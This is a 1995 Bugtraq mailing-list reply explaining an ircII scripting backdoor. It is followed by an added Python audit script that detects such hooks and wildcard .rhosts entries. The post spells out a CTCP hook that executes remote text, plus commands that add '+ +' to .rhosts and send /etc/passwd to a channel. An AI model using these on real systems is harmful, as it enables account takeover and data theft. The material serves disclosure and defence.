Bugtraq mailing list archives
Re: IRC Security Loophole
From: lwells () netcom com (Kernel Panic)
Date: Fri, 3 Feb 1995 18:30:53 -0800 (PST)
On Fri, 3 Feb 1995, Silicon Avatar wrote:
> On Fri, 3 Feb 1995, Lorna Leong wrote:
>> Hi, I read somewhere that there is a security loophole in IRC. I don't know anything else about it but I would like to find out more information about this. I heard that information about this IRC loophole can be found by FTP at ftp.cert.org, but I couldn't find anything relevant there.
>
> If you are talking about the "jupe" or "grok" hole, it was temporary, and merely a hacked version of the client floating around at "trusted" sites. To my knowledge, these "hacks" have been removed and are no longer a threat (unless someone is propagating these older clients.) Simply put, you could "CTCP grok [command]" (CTCP being a method of communication over IRC) someone, and have that command executed, unknowingly, off the account.

No, IRC holes are a more serious threat than you give them credit for. For example, if I were to add to a script (or better yet make someone type) the following:

    /on ^ctcp "% % JUPE" $3-

They would be just as much in my control as if they were on a hacked client. From this, you can do:

    /ctcp <nick> JUPE /exec echo + + >> $HOME/.rhosts

or

    /ctcp <nick> JUPE /red #<channel> /exec cat /etc/passwd

There's more to IRC backdoors than making people say stupid stuff on a channel. I hope this example clears that up a little.

/dev/kmem
- This sig deleted for brevity -
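
An added defensive example, not part of the original post or thread: a Python audit that flags ircII `/on` hooks like the one quoted above, where text sent by another user ends up choosing the command, plus a check for the `+ +` `.rhosts` entry the post mentions. The event list, reason strings, function names and sample data are assumptions constructed for illustration.

```python
import re

# ircII hook syntax: [/]on [^|-|+]<event> "<match pattern>" <body>
ON_HOOK = re.compile(
    r'^\s*/?on\s+[\^+-]?(?P<event>\w+)\s+'
    r'(?P<match>"[^"]*"|\S+)\s*(?P<body>.*)$', re.IGNORECASE)
# A body that begins with $*, $N or $N- lets the hook's arguments pick the command.
ARGS_AS_COMMAND = re.compile(r'^\{?\s*\$(?:\*|\d+-?)')
# Hook arguments handed to the client's evaluator or to a shell.
ARGS_TO_EVAL = re.compile(r'^\{?\s*/?(?:eval|exec)\b[^;]*\$(?:\*|\d+-?)', re.IGNORECASE)
# Events fired by text other users send (assumed list, not exhaustive).
REMOTE_EVENTS = {"ctcp", "ctcp_reply", "msg", "notice", "public"}


def audit_script(text):
    """Return (line_no, event, reason) for each risky /on hook in an ircII script."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        m = ON_HOOK.match(line)
        if not m or m["event"].lower() not in REMOTE_EVENTS:
            continue
        event, body = m["event"].lower(), m["body"].strip()
        if ARGS_AS_COMMAND.match(body):
            findings.append((no, event, "remote text run as a command"))
        elif ARGS_TO_EVAL.match(body):
            findings.append((no, event, "remote text passed to eval/exec"))
    return findings


def rhosts_wildcards(text):
    """Return line numbers of '+ +' (any host, any user) entries in a .rhosts file."""
    return [no for no, line in enumerate(text.splitlines(), 1)
            if line.split() == ["+", "+"]]


# Constructed sample input; line 2 is the hook quoted in the post.
SAMPLE_SCRIPT = '''\
/on ^msg "*" /echo *$0* $1-
/on ^ctcp "% % JUPE" $3-
/on ^ctcp "% % PAGE" /exec echo $3- | mail me
/on -join "*" /echo $0 joined $1
alias hi /say hello $0
'''
SAMPLE_RHOSTS = "trusted.example.org alice\n+ +\n"

if __name__ == "__main__":
    for finding in audit_script(SAMPLE_SCRIPT):
        print(finding)
    print("wildcard .rhosts lines:", rhosts_wildcards(SAMPLE_RHOSTS))
```

Hooks that only display the remote text (the first sample line) are not flagged; only those where it reaches the command position, `eval` or `exec` are.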